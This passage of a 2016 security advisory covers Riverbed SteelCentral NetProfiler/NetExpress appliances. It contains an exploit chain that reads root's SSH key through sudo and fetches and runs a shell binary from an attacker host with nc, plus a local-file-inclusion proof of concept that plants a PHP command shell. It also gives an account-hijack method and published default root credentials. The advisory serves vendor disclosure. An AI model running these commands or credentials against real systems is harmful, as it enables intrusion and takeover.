/usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f\r\n/opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4-\r\n| tr -d '`' | tr -d \"'\" > /tmp/root_ssh_privatekey; chmod 600\r\n/tmp/root_ssh_privatekey; ssh -o UserKnownHostsFile=/dev/null\r\n -o StrictHostKeyChecking=no -i /tmp/root_ssh_privatekey [email\u00a0protected]\r\n'nc -n [attacker ip] 4444 > /tmp/shell.elf;\r\nchmod 755 /tmp/shell.elf; /tmp/shell.elf';\r\n \r\n==Local File Inclusion==\r\nA local file inclusion vulnerability exists in the\r\n\u2018sensor/ta_loader.php\u2019 file due to a lack of input sanization for the\r\nGET parameter \u2018class\u2019. 
This allows an attacker to read or include\r\narbitrary files.\r\n \r\nAs a practical exploitation scenario, an attacker can obtain arbitrary\r\ncode execution through the LFI vulnerability by first using the \u2018Edit\r\n/etc/hosts\u2019 functionality available under\r\n\u2018/index.php?page=network_config\u2019 to create a fake host entry (e.g.\r\n'192.1.2.3 <?php echo system($_GET[\"cmd\"]); ?>' ) and write malicious\r\nPHP code on the appliance filesystem, then include the /etc/hosts file\r\nand execute arbitrary shell commands.\r\n \r\n[POC LFI]\r\ncurl https://<host>/sensor/ta_loader.php?cmd=<COMMAND>&class=/etc/hosts\r\n \r\n==Account Hijacking==\r\nThe password change functionality under the\r\n\u2018/index.php?page=security_compliance\u2019 page is vulnerable to a logic bug\r\nwhich allows account hijacking via arbitrary password reset. Although\r\nthe functionality prompts for the current account password before\r\nallowing the user to set a new password, the hashed credentials of all\r\nthe system accounts on the SteelCentral NetProfiler and NetExpress\r\nappliances are disclosed within the \u2018accountscredentialsid\u2019 hidden\r\nparameter in the page source code. The contents of the parameter are the\r\nbase64-encoded representation of a serialized PHP object containing the\r\ncredentials data.\r\n \r\nThis not only openly discloses the contents of the /etc/shadow file, but\r\ncan be also abused to carry out arbitrary password resets since the\r\ncurrent password verification is carried out on client-side against the\r\n\u2018oldpassword\u2019 field value within the serialized string. An attacker can\r\nfirst generate a valid SHA-512 hash for an arbitrary current password\r\nvalue along with computing the hash length. 
Then the password change\r\nHTTP request can be intercepted to decode the base64-encoded serialized\r\nobject and modify the \u2018oldpassword\u2019 hash value and its length for the\r\ntarget system account to hijack with the generated SHA-512 hash of the\r\nchosen current password value. The malicious string can now be base64\r\nencoded back and used to replace the original request string.\r\n \r\nAfter clicking the \u2018Configure Now\u2019 button the application will validate\r\nthe current password value provided through the web interface against\r\nthe injected hash value, successfully setting the new password to the\r\narbitrary value chosen by the attacker.\r\n \r\n==Hardcoded default credentials==\r\nMultiple system accounts are configured on every deployment of the\r\nSteelCentral NetProfiler and NetExpress virtual appliances with the same\r\nhardcoded default credentials publicly available on the web.\r\n \r\nUsers => mazu, dhcp, root\r\nPassword => bb!nmp4y\r\n \r\nThe default \u2018mazu\u2019 user sudo configuration allows the execution of all\r\nshell commands as root without being prompted for a password. The user\r\n'mazu' is the only privileged user account having remote SSH access to\r\nthe SteelCentral NetProfiler and NetExpress appliances (root SSH access\r\nis restricted to localhost only). However, the application does not\r\nenforce a password change for the built-in 'mazu' user during\r\nconfiguration time or after the first login. 
These insecure settings can\r\nbe exploited as a remote backdoor to gain a privileged SSH shell to the\r\ntarget system.\r\n \r\n+----------+\r\n| Solution |\r\n+----------+\r\nUpgrade Riverbed SteelCentral Netprofiler/NetExpress to version 10.9.0.\r\n \r\nAt the time of this writing, although the account hijacking\r\nvulnerability has been resolved, the contents of the /etc/shadow file\r\nare still disclosed in the hidden parameter \u2018originalsettingsid\u2019 when\r\nbrowsing to \u2018/index.php?page=security_compliance\u2019.\r\n \r\n+------------+\r\n| Timeline |\r\n+------------+\r\n24/03/2016 \u2013 Initial disclosure to Riverbed.\r\n25/03/2016 \u2013 Vendor confirms receipt of advisory.\r\n18/04/2016 \u2013 Sent follow up email asking for a status update\r\n19/04/2016 \u2013 Vendor replies engineering team is working on software patches.\r\n13/06/2016 \u2013 Vendor releases patched software build.\r\n27/06/2016 \u2013 Public Disclosure\r\n \r\n+------------+\r\n| Additional |\r\n+------------+\r\nhttp://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25136"}]}}